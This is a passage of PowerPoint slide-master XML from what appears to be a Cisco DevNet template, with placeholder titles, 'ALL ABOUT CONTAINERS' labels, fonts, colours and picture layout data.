                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{182696BE-37C8-7D49-9753-E9C01221B127}"/>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96034" y="5981159"/>
              <a:ext cx="349467" cy="365775"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="13" name="Picture 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28E69E19-8E61-3A49-9770-F85A9B2CF43B}"/>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1266486" y="5668092"/>
              <a:ext cx="233068" cy="233068"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="17" name="Picture 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95779378-9FE7-1E41-B181-1DD9A65E538F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr userDrawn="1"/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4"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251645" y="4882337"/>
              <a:ext cx="298692" cy="298692"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1899704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5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11FA1C9D-BAAC-7540-AA74-B04ED364A132}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>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a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2821054" y="1060327"/>
            <a:ext cx="3501892" cy="2534777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7635713-6CF6-4743-9F0B-3B95D9CD4448}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1316422" y="3671464"/>
            <a:ext cx="6885218" cy="553998"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D3A5C"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT Heavy" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                <a:cs typeface="CiscoSansTT Heavy" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D3A5C"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT Heavy" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                <a:cs typeface="CiscoSansTT Heavy" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>CiscoDevNet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D3A5C"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT Heavy" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                <a:cs typeface="CiscoSansTT Heavy" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D3A5C"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                <a:cs typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>|</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D3A5C"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT Heavy" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                <a:cs typeface="CiscoSansTT Heavy" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  #</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D3A5C"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT Heavy" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                <a:cs typeface="CiscoSansTT Heavy" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>DevNetExpress</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3000" b="1" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0D3A5C"/>
              </a:solidFill>
              <a:latin typeface="CiscoSansTT Heavy" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
              <a:cs typeface="CiscoSansTT Heavy" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="375381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1_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dirty="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2682E39F-58A8-3847-BD18-46182BBB5B2F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:alphaModFix amt="67000"/>
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId3"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8409541" y="4665276"/>
            <a:ext cx="591540" cy="304018"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="263571887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34B1C16-5163-4B41-BEEC-B89370F8557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286"/>
            <a:ext cx="9144000" cy="5140930"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="359280237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0" i="0">
                <a:solidFill>
                  <a:srgbClr val="005073"/>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400" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="003B55"/>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10/26/20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351029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00" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="005073"/>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10/26/20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3038815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2_Title Slide">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="bg2"/>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69497" y="3856737"/>
            <a:ext cx="8296421" cy="288131"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91420" tIns="45710" rIns="91420" bIns="45710" anchor="b" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:buNone/>
              <a:defRPr sz="1800" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>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7" y="4072670"/>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7" y="4348763"/>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3" y="3043654"/>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1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>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dirty="0"/>
              <a:t>Module Number</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="425766"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lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="CiscoSansTT ExtraLight"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Presentation Title Goes Here</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8FEF53B4-FCFE-924B-AA4A-AB56BBF1AAA3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>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a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="425765" y="52809"/>
            <a:ext cx="2540384" cy="1838808"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{254DBBAF-BF48-0C4E-9336-2D3C70D1F53E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6648913" y="4778344"/>
            <a:ext cx="2207942" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:alpha val="34000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ALL ABOUT CONTAINERS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="10" name="Straight Connector 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{48881DA9-736F-3D4A-B962-E7BD6AF257EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6707458" y="4772813"/>
            <a:ext cx="1823225" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:alpha val="34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70314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DCI Title">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432958-3DAC-1540-8377-CD6910C8AD8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224"/>
            <a:ext cx="9144000" cy="5163057"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="469497" y="3856737"/>
            <a:ext cx="8296421" cy="288131"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91420" tIns="45710" rIns="91420" bIns="45710" anchor="b" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:buNone/>
              <a:defRPr sz="1800" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>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7" y="4072670"/>
            <a:ext cx="8296421" cy="288131"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91420" tIns="45710" rIns="91420" bIns="45710"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="1800" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>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7" y="4348763"/>
            <a:ext cx="8296421" cy="288131"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91420" tIns="45710" rIns="91420" bIns="45710"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="1800" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>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3" y="3043654"/>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2"/>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dirty="0"/>
              <a:t>Module Number</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="425766"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2"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="CiscoSansTT ExtraLight"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Presentation Title Goes Here</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2BF87238-9584-4547-92FF-1D7CD0E8CD8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69496" y="237203"/>
            <a:ext cx="2209800" cy="1504950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{13201F20-7B4F-7E40-B929-A1315CB892A6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6648913" y="4778344"/>
            <a:ext cx="2207942" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ALL ABOUT CONTAINERS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="14" name="Straight Connector 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D7A8714-83C0-0F49-8386-11EE793A7854}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6707458" y="4772813"/>
            <a:ext cx="182322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11765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2"/>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27190831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DNA Title">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="bg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739AC88-612D-1948-AA17-2DAEC68C8E1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hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="469497" y="3856737"/>
            <a:ext cx="8296421" cy="288131"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91420" tIns="45710" rIns="91420" bIns="45710" anchor="b" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:buNone/>
              <a:defRPr sz="1800" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>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7" y="4072670"/>
            <a:ext cx="8296421" cy="288131"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91420" tIns="45710" rIns="91420" bIns="45710"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="1800" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>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7" y="4348763"/>
            <a:ext cx="8296421" cy="288131"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91420" tIns="45710" rIns="91420" bIns="45710"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="1800" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>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3" y="3043654"/>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2"/>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dirty="0"/>
              <a:t>Module Number</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="425766"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2"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="CiscoSansTT ExtraLight"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Presentation Title Goes Here</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="Picture 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1DC36B60-D600-084C-9EF6-AEEC009AA89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69496" y="237203"/>
            <a:ext cx="2209800" cy="1504950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E4094B60-2871-9341-B801-C0F6F1FDA47D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6648913" y="4778344"/>
            <a:ext cx="2207942" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ALL ABOUT CONTAINERS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="11" name="Straight Connector 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E877783-76FF-F048-8454-17BA1B5373C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6707458" y="4772813"/>
            <a:ext cx="182322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867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CC Title">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="bg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A7B0B21-F5A7-FA4F-B0FC-EE18261F9D2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9109363" cy="5143499"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="469497" y="3856737"/>
            <a:ext cx="8296421" cy="288131"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91420" tIns="45710" rIns="91420" bIns="45710" anchor="b" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:buNone/>
              <a:defRPr sz="1800" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>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7" y="4072670"/>
            <a:ext cx="8296421" cy="288131"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91420" tIns="45710" rIns="91420" bIns="45710"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="1800" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>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7" y="4348763"/>
            <a:ext cx="8296421" cy="288131"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91420" tIns="45710" rIns="91420" bIns="45710"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="1800" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>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3" y="3043654"/>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2"/>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dirty="0"/>
              <a:t>Module Number</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="425766"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2"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="CiscoSansTT ExtraLight"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Presentation Title Goes Here</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F632583B-88DD-EF4C-AA22-01FA30D97C0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69496" y="237203"/>
            <a:ext cx="2209800" cy="1504950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{09775AD1-8CDE-8646-9667-6A5438C4C4A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6648913" y="4778344"/>
            <a:ext cx="2207942" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
